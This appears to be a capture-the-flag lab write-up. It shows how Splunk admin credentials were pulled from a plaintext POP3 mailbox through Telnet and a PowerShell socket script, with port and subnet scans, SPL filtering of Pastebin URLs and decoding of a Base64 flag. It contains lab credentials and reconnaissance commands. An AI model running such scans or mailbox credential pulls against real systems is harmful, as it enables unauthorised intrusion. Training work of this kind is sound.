Case 05 Application & Data TDX Arena — IR Expert 08 / 15 / 2025

Mail n' Trail

Honeypot-captured suspicious download activity required pulling administrative Splunk credentials out of an exposed POP3 mail server, pivoting into the SIEM, identifying malicious URLs in the log stream, and decoding a Base64 payload to close the case. Credentials were recovered through two independent methods — a PowerShell TCP client and a Telnet interactive session — to validate the finding by methodological triangulation. Splunk SPL reduced 3,000+ raw events to 56 targeted IOCs. The final Base64 payload decoded to the challenge flag.

Executive Summary

A honeypot named Cowre captured anomalous download activity at a corporate site. The investigation required retrieving Splunk access credentials from a mail server, accessing the Splunk SIEM, identifying malicious URLs in its log stream, and decoding a Base64-encoded message to reveal the final flag.

Two independent methods were used to retrieve the email containing the Splunk credentials: a PowerShell-scripted TCP client that interacted with the POP3 server programmatically, and a Telnet interactive session that spoke POP3 directly. Both methods recovered the same credentials from the same email (message #4), and the redundancy is the point — the finding is defensible because two different tooling paths converged on the identical result.

With the recovered credentials, the Splunk web interface on TCP 8000 granted access to the log stream. Custom SPL queries normalized raw log URLs into a searchable field and filtered the event set from over 3,000 raw events down to 56 targeted Pastebin indicators. One of those URLs contained a Base64 string that decoded to "Congrats, you have finished CIT_FINAL successfully" — the challenge flag. VirusTotal sanity-checks on the Pastebin indicators surfaced a phishing classification on one of the captured URLs.

Findings & Analysis

Exposed POP3 service

TCP 110 on 10.0.111.157
+OK Dovecot (Ubuntu) ready

Unencrypted POP3 reachable over the network. Permitted full plaintext retrieval of emails including credentials in transit. The critical exposure point — any client with network access could read the mailbox.

Credentials in plaintext email

admin / CTF_Final!
(email #4 — "We launched Splunk!")

Splunk administrative credentials stored in the body of a notification email. Recovered via two independent methods (Telnet interactive and PowerShell scripted) to validate the finding by methodological redundancy, not a single lucky retrieval.

Splunk web interface exposed

http://10.0.111.157:8000
(no network restriction)

Splunk Enterprise accessible without IP allowlisting or VPN gating. The recovered credentials granted immediate access to sensitive log data on a service that should have been management-network-only.

SPL event filtering

3,000+ raw events
→ 56 targeted IOCs

Authored custom SPL with regex URL extraction and Pastebin filtering. Normalized raw log URLs into a searchable url field, then filtered to the Pastebin domain only. The order of magnitude reduction is the investigation's analytic product, not an accident.

Pastebin URLs in log stream

/raw/0cs1NHvh
/raw/2QAuwmHe
/raw/ZTWf2ZmP
/raw/C4B5ZK8K

Four distinct Pastebin raw URLs surfaced in the filtered log set. VirusTotal reputation checks ran across all four; 2QAuwmHe returned a phishing classification. The full list is recorded as IOCs for downstream blocklisting.

Base64 payload decoded

Q29uZ3JhdHM…VsbHk=
→ "Congrats, you have
finished CIT_FINAL
successfully"

Contents of /raw/0cs1NHvh were Base64-encoded. Decoded in PowerShell to plaintext. Base64 on paste sites is a common tactic to hide payloads and flags; decoding closed the attack chain from exposure through exfiltration.

IOC quick reference

Mail server: 10.0.111.157 — TCP 110 (POP3, plaintext)
Credentials recovered: admin / CTF_Final! (email #4)
Splunk host: 10.0.111.157 — TCP 8000 (no network restriction)
Pastebin IOCs: /raw/0cs1NHvh, /raw/2QAuwmHe, /raw/ZTWf2ZmP, /raw/C4B5ZK8K
Phishing classification (VT): /raw/2QAuwmHe
Decoded flag: "Congrats, you have finished CIT_FINAL successfully"
MITRE ATT&CK: T1071.001 (Application Layer Protocol — Web Protocols), T1071.003 (Application Layer Protocol — Mail Protocols)

Tools & Technologies

PowerShell TCP client

System.Net.Sockets.TcpClient used to speak POP3 programmatically when interactive Telnet was unavailable. Scripted, logged, reproducible — the approach of choice when the environment has PowerShell but not Telnet.

Telnet (POP3)

Interactive POP3 session over TCP 110 — USER, PASS, LIST, RETR n, QUIT. The quickest path when Telnet is installed and human-in-the-loop inspection is acceptable. Telnet was not present by default on the Windows Server image; enabled via dism.

Splunk Search Processing Language

Custom SPL authoring with rex field extraction, URL normalization, and domain filtering. The query is the analytic artifact — it's what turned an unreadable log stream into a set of four actionable indicators.

VirusTotal

Multi-engine URL reputation check on the Pastebin indicators captured from Splunk. One of four flagged as phishing — not the one that held the flag payload. Reputation data supplemented the analysis; it did not replace it.

Base64 decode (PowerShell)

Used to decode the payload retrieved from the flag-bearing Pastebin URL. Base64 on paste sites is a common tactic to hide content from casual viewers and simple keyword scans — decoding is part of the closing move.

Web browser (Chrome)

Splunk Web UI access with the recovered credentials, and direct inspection of the Pastebin raw pages that held the Base64 payload.

Method — Dual-Path Validation

Two independent methods recovered the same credentials from the same email. Both are documented in full below. This is not redundancy for its own sake — the value of a credential recovery finding is only as strong as the confidence that the recovery is real, and two different tooling paths converging on the identical result closes the confidence gap that a single successful command leaves open.

Why dual-method

A single successful Telnet session could be environmental luck — wrong account enabled by default, pre-authenticated session, tooling artifact. A single successful PowerShell TCP client could be a quirk of how StreamReader happened to handle the banner response. When both methods return the same credentials on the same message, neither explanation survives. The finding is confirmed by methodological triangulation, not by any one tool. That matters in a report a downstream reviewer will read: it turns an assertion into evidence.

Method A

Telnet — interactive POP3 session

Quickest path when Telnet is installed. Direct, human-readable command exchange over TCP 110. Preferred when interactive inspection of the mailbox is acceptable and a scripted log is not required.

A.01 Verify local IP 10.0.111.156

ipconfig

Why: The challenge spec placed the mail server at local IP + 1. Confirming the local IPv4 first is what makes the next step's target IP correct rather than guessed.

A.02 Ping the mail server No packet loss

ping -n 2 10.0.111.157

Why: Route and reachability check before any service-level work. If ping fails, the lab network is misconfigured or the target IP assumption is wrong — catching that now is cheaper than diagnosing it through a failed Telnet.

A.03 Enable Telnet client Installed

dism /online /Enable-Feature /FeatureName:TelnetClient

Why: Telnet ships with Windows Server but is disabled by default. Enabling it through dism avoids the longer Server Manager path and requires admin PowerShell. Documented because downstream reviewers need to know Telnet was not pre-installed.

A.04 Connect to POP3 +OK Dovecot (Ubuntu) ready

telnet 10.0.111.157 110

Why: POP3 on TCP 110 is plaintext and accepts simple line-based commands. The +OK Dovecot banner confirms the service is running and identifies the server software — useful context if something downstream behaves unexpectedly.

A.05 Authenticate and list messages 4 messages

USER johnd PASS toor LIST

Why: Standard POP3 authentication followed by LIST to enumerate mailbox contents. Four messages returned, sized 1117 / 1361 / 1210 / 869 bytes.

A.06 Retrieve and inspect each email Email #4 holds credentials

RETR 1 RETR 2 RETR 3 RETR 4

Why: Fetch each message in sequence and inspect content for credential-like material. Emails #1–#3 were operational notifications (maintenance, monitoring, software update). Email #4 — subject "We launched Splunk!" — contained username: admin and password: CTF_Final! in plaintext, along with the Splunk URL http://[SERVER-IP]:8000/.

A.07 Access Splunk with recovered credentials Dashboard reached

Browser → http://10.0.111.157:8000 Login: admin / CTF_Final!

Why: Direct validation of the recovered credentials against the target service. Successful login confirms the email contents were not stale — these are live administrative credentials on an exposed Splunk instance.

A.08 Author SPL to filter 3,000+ events to Pastebin URLs 56 events

index=* ("http://" OR "https://") | rex field=_raw "(?i)(?<url>https?://[^\s\"']+)" | search url="*pastebin.com*" | table _time url | sort -_time

Why: index=* with a URL-substring filter catches any event that mentions a URL or download command. rex extracts those URLs into a named url field so they can be ranked and filtered. Narrowing to *pastebin.com* drops the noise — the reduction from 3,000+ raw events to 56 Pastebin-specific events is the analytic product of the search, and the path that got there is visible in the query itself.

A.09 Reputation sanity-check via VirusTotal One phishing classification

# Each URL submitted to VirusTotal: https://pastebin.com/raw/0cs1NHvh https://pastebin.com/raw/2QAuwmHe ← phishing (VT) https://pastebin.com/raw/ZTWf2ZmP https://pastebin.com/raw/C4B5ZK8K

Why: Independent reputation signal on every captured URL. VirusTotal flagged 2QAuwmHe as phishing; the remaining three were not flagged by any engine. The phishing classification was not on the flag-bearing URL, which underlines the point — reputation data complements analysis, it does not replace it.

A.10 Decode the Base64 payload Flag recovered

# Retrieved from https://pastebin.com/raw/0cs1NHvh: Q29uZ3JhdHMsIHlvdSBoYXZlIGZpbmlzaGVkIENJVF9GSU5BTCBzdWNjZXNzZnVsbHk= # Decoded: "Congrats, you have finished CIT_FINAL successfully"

Why: Base64 on paste sites is a standard payload-hiding technique. Decoding is the closing move on the attack chain — from exposure (open POP3) through credential recovery, SIEM pivot, IOC isolation, and finally the hidden content itself.

Method B

PowerShell — scripted POP3 via TcpClient

Used when Telnet is not installed or when a scripted, logged, reproducible trace is required. Interacts with the POP3 service at the socket level through System.Net.Sockets.TcpClient.

B.01 Confirm local IP 10.0.90.252

ipconfig

Why: Same rationale as Method A — the target IP is derived from the local IP. Different lab session, different IPs; same protocol.

B.02 Ping mail server Reachable

ping -n 2 10.0.90.253

Why: Reachability check before service-level work.

B.03 Enumerate open mail ports 110 open

$ports = 22,110,143,993,995,25,587 foreach ($p in $ports) { Test-NetConnection 10.0.90.253 -Port $p | Select-Object ComputerName,RemotePort,TcpTestSucceeded }

Why: Enumerate the common mail and shell ports in one loop to establish the attack surface before committing to an approach. POP3 (110) confirmed open; SMTP (25) and POP3S (995) also responded; IMAP (143, 993) closed. Choice of POP3 over IMAP is dictated by what's actually open.

B.04 Open POP3 session over TcpClient Banner received

$tcp = New-Object System.Net.Sockets.TcpClient("10.0.90.253",110) $stream = $tcp.GetStream() $writer = New-Object System.IO.StreamWriter($stream) $reader = New-Object System.IO.StreamReader($stream) $reader.ReadLine() # +OK Dovecot (Ubuntu) ready $writer.WriteLine("USER johnd"); $writer.Flush(); $reader.ReadLine() $writer.WriteLine("PASS toor"); $writer.Flush(); $reader.ReadLine() $writer.WriteLine("LIST"); $writer.Flush(); $reader.ReadToEnd()

Why: TcpClient speaks raw TCP, which is all POP3 is. StreamWriter.Flush() on every line matters — without it, PowerShell's buffering silently holds commands and the server receives nothing. ReadLine() after each write synchronizes on the server response. Explicit, scripted, and reproducible — the exact opposite of Telnet's interactive convenience.

B.05 Retrieve message #4 — recover credentials admin / CTF_Final!

$writer.WriteLine("RETR 4"); $writer.Flush() while (($l = $reader.ReadLine()) -ne ".") { $l | Out-Host }

Why: POP3 terminates a multi-line response with a bare period on its own line. Reading until . is the correct termination — reading a fixed byte count would truncate, and reading to end-of-stream would hang waiting for the server to close the socket. Same credentials surfaced as Method A: admin / CTF_Final!. The dual-path validation is complete.

B.06 Scan subnet for Splunk 10.0.90.253:8000

241..254 | ForEach-Object { $ip = "10.0.90.$_" if ((Test-NetConnection $ip -Port 8000 -WarningAction SilentlyContinue).TcpTestSucceeded) { Write-Host "Splunk found at $ip" } }

Why: In this lab session, the Splunk host's exact IP wasn't stated up front — only that it was in the subnet. Port-8000 sweep across the relevant range locates it without requiring DNS or broadcast reconnaissance. -WarningAction SilentlyContinue suppresses the noise from each failed connection attempt.

B.07 Authenticate, author SPL, close the chain Flag recovered

# Login: admin / CTF_Final! at http://10.0.90.253:8000 # SPL (same pattern as Method A): index=* ("http://" OR "https://") | rex field=_raw "(?i)(?<url>https?://[^\s\"']+)" | stats count by url | sort -count

Why: The SPL pattern is stable across both methods. Minor variation — stats count by url instead of table — gives a ranked indicator list rather than a time-ordered stream, useful when prioritizing for blocklisting. Decoded the same Base64 payload from /raw/0cs1NHvh to recover the identical flag. Chain closed independently of Method A.

Recommendations

Close unencrypted mail services at the network edge

POP3 on TCP 110 transmits credentials and message bodies in plaintext. Where POP3 is required, it should be tunneled through TLS (POP3S on 995) or restricted to management networks via firewall rule. The specific exposure in this case — administrative credentials readable by any host with network access — is entirely eliminated by either control.

Never transmit credentials in email bodies

Credentials delivered by email persist in the mailbox, in backups, in mail-archive systems, and in every client that has synced the account. Rotate any credentials that may have been delivered this way, and replace the operational pattern with an out-of-band channel (password manager share, one-time credential delivery, identity-provider-initiated onboarding).

Network-restrict SIEM and management interfaces

Splunk Web on TCP 8000 reached from any host on the network is the second half of the failure chain in this case. SIEM web interfaces belong on management networks, behind VPN, or behind an identity-aware proxy. MFA on the Splunk admin account is a necessary complement, not a substitute.

Operationalize Base64 and encoding detection in SPL

The Base64 payload in this case was the final concealment step. SPL queries that flag high-entropy strings, Base64-shaped patterns, or common encoding markers in log fields turn that concealment into a detection. Automate the pattern, alert on it, and correlate with outbound traffic to paste-site domains.

Use multiple methods when the finding must be defensible

For findings that will be cited in a report or inform downstream action, recovering the same result through two independent tooling paths is not extra work — it is the difference between assertion and evidence. The dual-method approach used here (Telnet + PowerShell TCP client) is a pattern that generalizes to any recovery operation where confidence in the result matters.

Technical Note

SPL as the analytic artifact

The investigation's central analytic move is the reduction from 3,000+ raw events to 56 Pastebin-specific events. That reduction is the SPL query itself. It's not a filter applied to a display — it is the data transformation that produced the finding. Two components do the work: a rex extraction that lifts URLs out of unstructured _raw into a named field, and a wildcard search that narrows by domain. Neither is sophisticated individually. Together they are the difference between an unreadable log stream and a list of four IOCs ready for downstream action.

The query generalizes. Any investigation involving URLs embedded in log text can apply the same pattern: regex-extract into a named field, filter by the domain class of interest, surface what's left. Downstream investigators reading the SPL should be able to retarget it to a different domain or indicator class with a single-line change. That portability is part of what SPL authoring — as distinct from SPL running — actually produces.

Methodological redundancy with Telnet and PowerShell served a different purpose: defending the credential recovery against the possibility of tooling artifact. Both are characteristic of the case type. One investigation asked "what are the indicators?" and answered through SPL. A parallel part of the same investigation asked "are these really the credentials?" and answered through independent re-derivation. Both questions got explicit, documented answers.

References

MITRE ATT&CK — Application Layer Protocol. T1071.001 (Web Protocols) and T1071.003 (Mail Protocols) map to the Pastebin command-and-control pattern and the POP3 credential exfiltration surface observed in this case. attack.mitre.org/techniques/T1071
Splunk Search Reference. Official SPL documentation for rex, search, and stats — the core commands used to author the filter that produced the IOC list. docs.splunk.com
VirusTotal. Multi-engine URL reputation source used to supplement the Splunk-derived IOCs. virustotal.com
Microsoft — POP3 Protocol reference. Canonical reference for POP3 commands (USER, PASS, LIST, RETR, QUIT) and response framing, including the multi-line dot-terminator used in RETR responses. learn.microsoft.com